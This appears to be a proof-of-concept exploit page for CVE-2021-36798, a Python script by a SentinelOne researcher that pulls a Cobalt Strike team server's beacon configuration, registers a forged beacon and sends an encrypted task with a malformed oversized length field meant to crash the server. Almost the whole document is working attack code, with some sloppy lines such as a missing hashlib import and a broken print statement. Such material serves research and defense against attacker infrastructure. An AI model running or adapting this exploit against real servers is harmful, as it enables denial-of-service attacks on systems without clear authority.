4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2021-36798.py PY
#!/usr/bin/python3
'''
By Gal Kristal from SentinelOne ([email protected]) @gal_kristal
Refs: 
    https://github.com/RomanEmelyanov/CobaltStrikeForensic/blob/master/L8_get_beacon.py
    https://github.com/nccgroup/pybeacon
'''

import requests, struct, sys, os, urllib3
import argparse
from parse_beacon_config import cobaltstrikeConfig
from urllib.parse import urljoin
from io import BytesIO
from Crypto.Cipher import AES
import hmac
import urllib
import socket
import hexdump
from comm import *

HASH_ALGO = hashlib.sha256
SIG_SIZE = HASH_ALGO().digest_size
CS_FIXED_IV = b"abcdefghijklmnop"

EMPTY_UA_HEADERS = {"User-Agent":""}
URL_PATHS = {'x86':'ab2g', 'x64':'ab2h'}

def get_beacon_data(url, arch):
    full_url = urljoin(url, URL_PATHS[arch])
    try:
        resp = requests.get(full_url, timeout=30, headers=EMPTY_UA_HEADERS, verify=False)
    except requests.exceptions.RequestException as e:
        print('[-] Connection error: ', e)
        return

    if resp.status_code != 200:
        print('[-] Failed with HTTP status code: ', resp.status_code)
        return

    buf = resp.content

    # Check if it's a Trial beacon, therefore not xor encoded (not tested)
    eicar_offset = buf.find(b'EICAR-STANDARD-ANTIVIRUS-TEST-FILE')
    if eicar_offset != -1:
        return cobaltstrikeConfig(BytesIO(buf)).parse_config()

    offset = buf.find(b'\xff\xff\xff')
    if offset == -1:
        print('[-] Unexpected buffer received')
        return
    offset += 3
    key = struct.unpack_from('<I', buf, offset)[0]
    size = struct.unpack_from('<I', buf, offset+4)[0] ^ key
    head_enc = struct.unpack_from('<I', buf, offset+8)[0] ^ key
    head = head_enc & 0xffff

    # Taken directly from L8_get_beacon.py
    if head == 0x5a4d or head ==0x9090:
        decoded_data = b''
        for i in range(2+offset//4, len(buf)//4-4):
            a = struct.unpack_from('<I', buf, i*4)[0]
            b = struct.unpack_from('<I', buf, i*4+4)[0]
            с = a ^ b
            decoded_data += struct.pack('<I', с)

        return cobaltstrikeConfig(BytesIO(decoded_data)).parse_config()

def compare_mac(mac, mac_verif):
	if mac == mac_verif:
		return True
	if len(mac) != len(mac_verif):
		print
		"invalid MAC size"
		return False

	result = 0

	for x, y in zip(mac, mac_verif):
		result |= x ^ y

	return result == 0

def decrypt(encrypted_data, iv_bytes, signature, shared_key, hmac_key):
	if not compare_mac(hmac.new(hmac_key, encrypted_data, digestmod="sha256").digest()[0:16], signature):
		print("message authentication failed")
		return

	cypher = AES.new(shared_key, AES.MODE_CBC, iv_bytes)
	data = cypher.decrypt(encrypted_data)
	return data


def register_beacon(conf):
    """Registers a random beacon and sends a task data.
    This is a POC that shows how a beacon send its metadata and task results with Malleable profiles
    
    Args:
        conf (dict): Beacon configuration dict, from cobaltstrikeConfig parser
    """
    # Register new random beacon
    urljoin('http://'+conf['C2Server'].split(',')[0]+":"+str(conf['Port']), conf['C2Server'].split(',')[1])
    aes_source = os.urandom(16)
    m = Metadata(conf['PublicKey'], aes_source)
    t = Transform(conf['HttpGet_Metadata'])
    body, headers, params = t.encode(m.pack().decode('latin-1'), '', str(m.bid))

    print('[+] Registering new random beacon: comp=%s user=%s' % (m.comp, m.user))
    try:
        #print(body)
        #print(headers)
        #print(params)
        req = requests.request('GET', urljoin('http://'+conf['C2Server'].split(',')[0]+":"+str(conf['Port']), conf['C2Server'].split(',')[1]), params=params, data=body, headers=dict(**headers, **{'User-Agent':''}), timeout=5)
    except Exception as e:
        print('[-] Got excpetion from server: %s' % e)
        return

    # This is how to properly encrypt a task:
    # Tasks are encrypted with the session's aes key, decided and negotiated when we registered the beacon (it's part of the metadata)
    ## Here is where you'll build a proper task struct ##
    random_data = os.urandom(50)
    # session counter = 1
    data = struct.pack('>II', 1, len(random_data)) + random_data
    pad_size = AES.block_size - len(data) % AES.block_size
    data = data + pad_size * b'\x00'

    print("---------------")
    print(data)
    print("---------------")

    # encrypt the task data and wrap with hmac sig and encrypted data length
    cipher = AES.new(m.aes_key, AES.MODE_CBC, CS_FIXED_IV)
    enc_data = cipher.encrypt(data)
    sig = hmac.new(m.hmac_key, enc_data, HASH_ALGO).digest()[0:16]
    enc_data += sig
    enc_data = struct.pack('>I', len(enc_data)) + enc_data

    # task data is POSTed so we need to take the transformation steps of http-post.client
    t = Transform(conf['HttpPost_Metadata'])
    body, headers, params = t.encode(m.pack().decode('latin-1'), enc_data.decode('latin-1'), str(m.bid))

    print('[+] Sending task data')

    try:
        req = requests.request('POST', urljoin('http://'+conf['C2Server'].split(',')[0]+":"+str(conf['Port']), conf['HttpPostUri'].split(',')[0]), params=params, data=body, headers=dict(**headers, **{'User-Agent':''}), timeout=5)
    except Exception as e:
        print('[-] Got excpetion from server while sending task: %s' % e)

    Task_type=int.to_bytes(3, length=4, byteorder='big', signed=False)
    #print (Task_type)
    data_size=int.to_bytes(4275658244,length=4, byteorder='big', signed=False)
    #print (data_size)
    im_data = int.to_bytes(9999999999999999999999999999999,length=1024,byteorder='big', signed=False)
    screenshost =  Task_type + data_size + im_data
    data = struct.pack('>II', 3, len(screenshost)) + screenshost
    pad_size = AES.block_size - len(data) % AES.block_size
    data = data + pad_size * b'\x00'

    cipher = AES.new(m.aes_key, AES.MODE_CBC, CS_FIXED_IV)
    enc_data = cipher.encrypt(data)
    sig = hmac.new(m.hmac_key, enc_data, HASH_ALGO).digest()[0:16]
    enc_data += sig
    enc_data = struct.pack('>I', len(enc_data)) + enc_data

    t = Transform(conf['HttpPost_Metadata'])
    body, headers, params = t.encode(m.pack().decode('latin-1'), enc_data.decode('latin-1'), str(m.bid))

    print('[+] Sending task data')

    try:
        req = requests.request('POST', urljoin('http://'+conf['C2Server'].split(',')[0]+":"+str(conf['Port']), conf['HttpPostUri'].split(',')[0]), params=params, data=body, headers=dict(**headers, **{'User-Agent':''}), timeout=5)
    except Exception as e:
        print('[-] Got excpetion from server while sending task: %s' % e)


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="Parse CobaltStrike Beacon's configuration from C2 url and registers a beacon with it")
    parser.add_argument("url", help="Cobalt C2 server (e.g. http://1.1.1.1)")
    args = parser.parse_args()

    x86_beacon_conf = get_beacon_data(args.url, 'x86')
    x64_beacon_conf = get_beacon_data(args.url, 'x64')
    if not x86_beacon_conf and not x64_beacon_conf:
        print("[-] Failed finding any beacon configuration")
        exit(1)

    print("[+] Got beacon configuration successfully")
    conf = x86_beacon_conf or x64_beacon_conf
    print("---------------")
    print(conf)
    print("---------------")
    register_beacon(conf)
    #while 1:
    #    register_beacon(conf)